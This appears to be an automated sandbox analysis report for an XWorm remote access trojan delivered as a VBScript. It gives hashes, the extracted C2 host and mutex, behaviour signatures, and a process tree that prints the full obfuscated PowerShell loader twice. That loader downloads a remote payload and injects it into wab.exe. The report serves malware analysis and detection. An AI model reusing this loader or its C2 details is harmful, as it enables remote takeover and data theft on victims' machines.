xworm | b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1

General

Target

upload.vbs
Size

896KB
MD5

a227043beb151087c1798b6f9aaabd4c
SHA1

b2c4537386ed7931d9df29719f11f0f019e0f43a
SHA256

b8ac41b4cb337b5d1c12345f1cfbf125efeaafb14f7bdbac85717a358ed2a1d1
SHA512

1031ce3bea154181078799db133f2a8e419f912d548b69bd21572707bd7a3cf2c44cc273b1f582a0edcae73523c2927c210c0917c758b92364d64977b2ca208e
SSDEEP

12288:qzTzUyR7hSRac+qkLmttaGgMskgqoiMHsp9p:UXh+k+taGKqoJOp

Score

10^/10

xworm rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

C2

x5387400.duckdns.org:8896

Mutex

F4ssR8b386Bj6q2g

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2656-92-0x0000000000350000-0x0000000000360000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 5 IoCs

Processes:

powershell.exe

flow pid process

5 1788 powershell.exe
7 1788 powershell.exe
9 1788 powershell.exe
11 1788 powershell.exe
13 1788 powershell.exe
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

2656 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

2856 powershell.exe
2656 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2856 set thread context of 2656 2856 powershell.exe wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

1788 powershell.exe
2856 powershell.exe
2856 powershell.exe
2656 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

2856 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 1788 powershell.exe
Token: SeDebugPrivilege 2856 powershell.exe
Token: SeDebugPrivilege 2656 wab.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

wab.exe

pid process

2656 wab.exe

flow	pid	process
5	1788	powershell.exe
7	1788	powershell.exe
9	1788	powershell.exe
11	1788	powershell.exe
13	1788	powershell.exe

pid	process
2656	wab.exe

pid	process
2856	powershell.exe
2656	wab.exe

description	pid	process	target process
PID 2856 set thread context of 2656	2856	powershell.exe	wab.exe

pid	process
1788	powershell.exe
2856	powershell.exe
2856	powershell.exe
2656	wab.exe

pid	process
2856	powershell.exe

description	pid	process
Token: SeDebugPrivilege	1788	powershell.exe
Token: SeDebugPrivilege	2856	powershell.exe
Token: SeDebugPrivilege	2656	wab.exe

pid	process
2656	wab.exe

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2420 wrote to memory of 1788	2420	WScript.exe	powershell.exe
PID 2420 wrote to memory of 1788	2420	WScript.exe	powershell.exe
PID 2420 wrote to memory of 1788	2420	WScript.exe	powershell.exe
PID 1788 wrote to memory of 2720	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 2720	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 2720	1788	powershell.exe	cmd.exe
PID 1788 wrote to memory of 2856	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 2856	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 2856	1788	powershell.exe	powershell.exe
PID 1788 wrote to memory of 2856	1788	powershell.exe	powershell.exe
PID 2856 wrote to memory of 2980	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2980	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2980	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2980	2856	powershell.exe	cmd.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe
PID 2856 wrote to memory of 2656	2856	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upload.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:2420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1788

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"
3⤵
PID:2720

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$eksaminering = 1;$Panscientist='Sub';$Panscientist+='strin';$Panscientist+='g';Function Handspec($Televisionsnettenes){$Moralisation247=$Televisionsnettenes.Length-$eksaminering;For($Hdqrs=5;$Hdqrs -lt $Moralisation247;$Hdqrs+=6){$Junco+=$Televisionsnettenes.$Panscientist.Invoke( $Hdqrs, $eksaminering);}$Junco;}function Tramman($Hastener){& ($Cosmologies) ($Hastener);}$Fljlskjoler=Handspec ' OverMSqui.oSelinzga.opiVerselahslulUdlbsaCotil/N.umi5Fry t.Co.pa0Fordu Agnoi(thereWC.mpaiNay,rnMas edRegisoResliw aksesS,mek PinnaN KanaTFiber Jak e1 Dubb0Trekv.Pseud0Udsm.;.inis PrecoWScoloi For nbyrin6Sabba4 Port;Bille kurslx .phe6 Kree4Ro,nt;Aktie Burmer Da avDomin:Vildn1Bi,li2Domme1Immat.syd.o0Ureth)Goos SlyngGshipweLeucacSaturk KrypoGazel/Angst2U vlg0Slkke1 stt,0Distr0 Eume1jacko0Skinn1Al.ri AlwatFDobbei EksprDeveie Moraffl.skoIntrexResul/ Sten1Serie2Ps,ko1Perem.tranl0Mo,el ';$Querimonies=Handspec 'NuculU.rspas KunseKr,ktrKatho-HyperALinj gDelpreNew on TilltTilpa ';$Explorator=Handspec 'Sst,rhSpoketVans tParslpr.manswhees:Ggle /Vandf/ LaurwAnat,wAfholwGifti.DiollsSpongeChro.nArchid ForksUfattpEgonsaStr bcTebore Ny n.P pircmynheoPrecomSemic/MoralpUn larNoncooPrygl/.ensld GisalAftrd/ p,iveKnsbj7StikloSolilpDutchyBnlig8Prope ';$Forskningscenterets=Handspec 'Phro > Taro ';$Cosmologies=Handspec 'VicisiBarieeTudlix .ham ';$Overhair='Mottos';$Nonpros = Handspec 'KatteeSnubbcHyp,rhUnsh oHo,do Suppe%Poseka UdlipNyslvpDispodWo,gaaPernatTransastere%Skure\.ntheL ramdInvene NedgrJenvimSy.rpaNondecAnthrhLa ereGabbitS inntMakeseUdspinHydrosOopho.Toph K MetauMi,idr A,sa Outpr&Sigva& Expe Lar.eBar kc OverhPeriooEquic KromitM,nke ';Tramman (Handspec 'Begor$Beto gGladllRupisoUnswibChacoaChiselEtati:EksotPf.odse InteaForbrrS.ulkmOutsea.ensaiSouvenT.ppesKultu=trans(Kon,rcInte mGranddBouri Scrat/SupercSelme eluci$DebilNTaoisoFelttnDis tpMel,er HyleoSt pes Opri)Rumba ');Tramman (Handspec 'Zamb.$MisspgVinielKorkeoBluefbT,nikaSkygglQuod,:UdganpJacobu Borts ConitUnioneEndivn Boa dSporie UbemsFredf=Windo$Stre.EPostuxDolmep Wergl TjekoKomperAksgraKoll tHattioVarmerKonst.Nummus Fi.apKaff l,ociaiNosogtSrett( grat$ subpFBu eao Pyror.oojasAce ykRechanBostoiP,trun StjfgBulb sRealic,armpeM ensnRernetMsketeUdvikrFranceFadertchefpsMaioi)Triba ');$Explorator=$pustendes[0];$Bumblings= (Handspec 'Manus$SgeregCirc.lBlytaoSknhebGstelaVrdillAkse :DisplFSidepaMo ifrBy,tevAfibreSpurvlS.ackl kkileZoolotSubsk=ClareNBejleeSchiswgifti-RecubON ninbFremfj AfsleGeadec Ge lt Gira MeldrSBytt yMonersVidertEksile KapimCir.i.,iquaN Com.eOpregt.ross.LyknsWSy,paeUnco,b,fsnrCUndislGlau.iWr,biePlastnTamist');$Bumblings+=$Pearmains[1];Tramman ($Bumblings);Tramman (Handspec ' tikm$S,ampFThoriaReechr R.devSup,eeUnulclItonilSoapfe U,clt.ungu. IsraHStandex.verauncred Bh geo.acor ,rkmsSplat[Napal$ PhotQT ahou In,peSp.rirIntraiShabbmAlbumo FolknGo.sai,nname AutosGang ]Datal=Dinar$klargFsade,l emijKbesulBran,sWindok FabrjUndeso.ecuplGadabeLipogrNinia ');$Uformuenheds=Handspec 'buffo$Kre.tFZitasaB tchrD ktov Nephe,epsblParablKrimieNo.attSofte.OversDCallooH,lebwB,sidnDek,tlJo,efoVerdia hyssd DietFIvywoiOrddelSljdle Curi(Hanke$ OverE Pl uxt issp KontlDdbi.oChr,srMenueaModtatPilloo Cri rafbre,Ele t$ ekstCB belyCirkuk,ylogeAf etlGastrtDishau,eputrStorhsFremf)Baldp ';$Cykelturs=$Pearmains[0];Tramman (Handspec ' Spyd$Kreerg .ipelCar oo.empebMusk.aindh.lmi,sp:SmlenMMusl.eDiphyrDilutiNondidFejlki s.eca Ent nLa ereStvlerDend.n monoeUnionsMelle=F rtt(Ma.dsTKrse,eNymphs AdaptBagpa- BagbP JeriaLargetBeatmhHib,r Ndigs$ PartCT ucuyTutork En,eeFortrlDobbetGaranuOffenrShechsRe ul)Forbi ');while (!$Meridianernes) {Tramman (Handspec 'Aflej$UdbedgTr.nslSculkoJubilbAf.taa,edthlNonun: opliKTrafio.oskulSkriflOverge KombgSurviiRefraeBi.chvhpar rMyxe,estalel Bests S amePapertColops Jets=Couch$ xacttfrtidrKonseuCreweeLutri ') ;Tramman $Uformuenheds;Tramman (Handspec 'vejrmSUnspot orlsaBk,enrNonsetMonti-UdlndSElertl Sa.eeTavshe pro ptimia Ophth4Quil ');Tramman (Handspec 'Brita$We sdgSennilJ,beroKugedb Sub.aAnvenl,ereg:imporMCephae HybrrDure iGradmdN.mmeifruesa .kamnpainteFoliar.ilianAn,aceB sils prek=Hyp.i(B,werTDaim e klipsBevbntSpr,n-Di hpPClar.aSansetForlah Musc Eve,n$Ind,mCMaaneyW.llckSkakkequirkl SphetManipunondirCartosHall )Rr,gg ') ;Tramman (Handspec 'Hobbi$Bredeg S.lll afskoS onebFaktua Fhovl Pneu:.efamB Vandr KwannV.caleNarkolUnmeegnoesieAer,mrberoes Skar=Debit$Sim ag.emifl In.uo orlibAnt,laa skelklane:.elehB Dursr.tvbrePrewecMessecLittei Skova Yoket Mutue.dste+ Su r+De.as%Nonsh$MillipLoev,uLeje s Bru tOpeneesputen P ntdTelepeboligsEnerg.Handycmetr.o PostuUnbianFavortUnwhi ') ;$Explorator=$pustendes[$Brnelgers];}$Gymnogenous=317537;$Stopfodring=29102;Tramman (Handspec 'Rizzo$KonfegLkkeslHalvpoDyb abResheaAa,enlneure: sho,NIndv e ArbecModsteTidinsk biks SpinikuldetPresoaDdsserRes liVenisa OprunForvei Sym.sPostdmRhamn Bund= Opsl cryobG.aponeintertTung -PreinCUnquio SammnCa,olt ,jlpeSyretn BloktDi,tr nio$AntikC BedryplankkMidcaeOnychlHingstOutw,uCringr K,ydsAal.o ');Tramman (Handspec 'Anapt$radiogElectl FjoloSvrvgbdingla.terllUnpra: ournSTrillt estei ForegPlanabHy.obo BrnerCarredsuper Spra,=Ulcer Tu,is[DiploSSpaltyFondssGysert B.mmeHabi.mFange.K rakCKni mo Kystn Ver v AfspeUpaakrNougatInter]Fomi,:pierc:EridaFopinirVaso.o ,ausm ReliB Wan,aOverhsThreaeSt,ll6 .esk4,ressSPhototLad orUdraai No,anBevisgBloka(e,tra$an elNI,buseUbestcScripe Tilss C,risClam iHovedtFittiaTetrarUnproiindisa arlinHaggaiSchems Dog m,irku)Sukke ');Tramman (Handspec ' Cens$Tandsg RelelVant oSfartbNonpua yprlHensy:Mi.deKUn,uiuIntrompresceAdsminFragmi ntrek Te.nkm rroe Ba.gnUndersSaccu U.ha=igloe .onc[Pt.alSbelsiyTallysKaemptFrem ePoulamSte,e.da seTHypodeDestix etost Psy . Ce,iEUdb.tnEquidcPretio BrugdInt aiAttranWittigKwela]Jvnfr:Samme:IrritA.ilitS LevaC UncaI.oligIShirt. inyG valgeKortstMissiSAvi.st Gen,r .raniGtcp,nBugv.g,ades(Pil.r$EtnolS U cot Illuidagshg tychbVolcao FletrCommodOpels) Aa,u ');Tramman (Handspec ' Marg$EpoxygSkydelKreeroFormkbAnvenaDeroglIndko:ScrubFSt,rse Eu rmDipp oMamalgAgerdt Aec.yGlittvGasrae UncoaAutalaSkolor ReadsBanem2 Oven4 ulso=Nonfi$ B ssKSyntauByggemLimiteMor.enreminiBleatkElytrkUn cceSoli.nba twsFod.u.Ko,tvsS.redu,dsteb TequsFa vet NarirPeritiE stenVandrgSt rs(Flage$SuperG de.mySexetm Da.inStyrtoDandrgHeltae rednI.teroWordluOcellsGrave, prud$mulieS P,lpt F,rsoForskpOwherfAfdrao paupdGastrrPensaiBu.shnHe itgI sol)Wa er ');Tramman $Femogtyveaars24;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2856

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Ldermachettens.Kur && echo t"
4⤵
PID:2980

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:2656

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
4f8708b3ae63602724c00b01439412d0

SHA1
114ca3c8fdb48cec8c628ae90efd32a540a521c2

SHA256
b2f2b0c52ff4e3a0f8cf82054c3f620e7b449ac56f0bf1ea0a2801ad8aa9ea2c

SHA512
4ed1349fd7a2a23e63cdd5d242abe465ca17166b099185d6881cad0753b54a677c54191aa152a3fd529384b26bc525c82e2355c8d15f551cac31be83d4e29ec4

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar3F29.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Ldermachettens.Kur
Filesize
451KB

MD5
025a6247195641a554ded5d68762070f

SHA1
6a3e9a2bc4f57a8d63c2a860e7aa7069ddb5a0b5

SHA256
672dfc440d33e5cc5c8dc760df125ac4869e6bd412c97008738c3a9e9e16d9fb

SHA512
67333f46fdcf2b94aba54f273a5c9d06ef4ce6b9e3702b3925a8dfb56d0c2653b419015acdd54cbf6620e53d86d962dec5403215c1ad23d7891c492c4c971bdc

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\OP76JYQ7CO1A1LN67G6R.temp
Filesize
7KB

MD5
65ac7ba65ba782cc47d7b4a52ebf78a4

SHA1
df62e07e2557a4134586fd3166e46f1bd7fc2d4a

SHA256
9582cd8f85070b050f2c4ca08072c32509be3f03d6c83f16cae441f177cc82b6

SHA512
91468de7bd1915dba54972058cb9de04a5eecdf912c461ac155379bb9dee0f25d4273c90d4758133c02c009111bd5feb9615e879bf6914c7934bc1d841b8f57e

Download Submit
memory/1788-6-0x00000000004F0000-0x00000000004F8000-memory.dmp

Filesize
32KB

Download
memory/1788-59-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-11-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-8-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-7-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-4-0x000007FEF5B6E000-0x000007FEF5B6F000-memory.dmp

Filesize
4KB

Download
memory/1788-10-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-91-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-9-0x000007FEF58B0000-0x000007FEF624D000-memory.dmp

Filesize
9.6MB

Download
memory/1788-60-0x000007FEF5B6E000-0x000007FEF5B6F000-memory.dmp

Filesize
4KB

Download
memory/1788-5-0x000000001B7A0000-0x000000001BA82000-memory.dmp

Filesize
2.9MB

Download
memory/2656-79-0x0000000000350000-0x00000000013B2000-memory.dmp

Filesize
16.4MB

Download
memory/2656-90-0x0000000000350000-0x00000000013B2000-memory.dmp

Filesize
16.4MB

Download
memory/2656-92-0x0000000000350000-0x0000000000360000-memory.dmp

Filesize
64KB

Download
memory/2856-58-0x00000000067D0000-0x000000000A6FA000-memory.dmp

Filesize
63.2MB

Download

Analysis

Sharing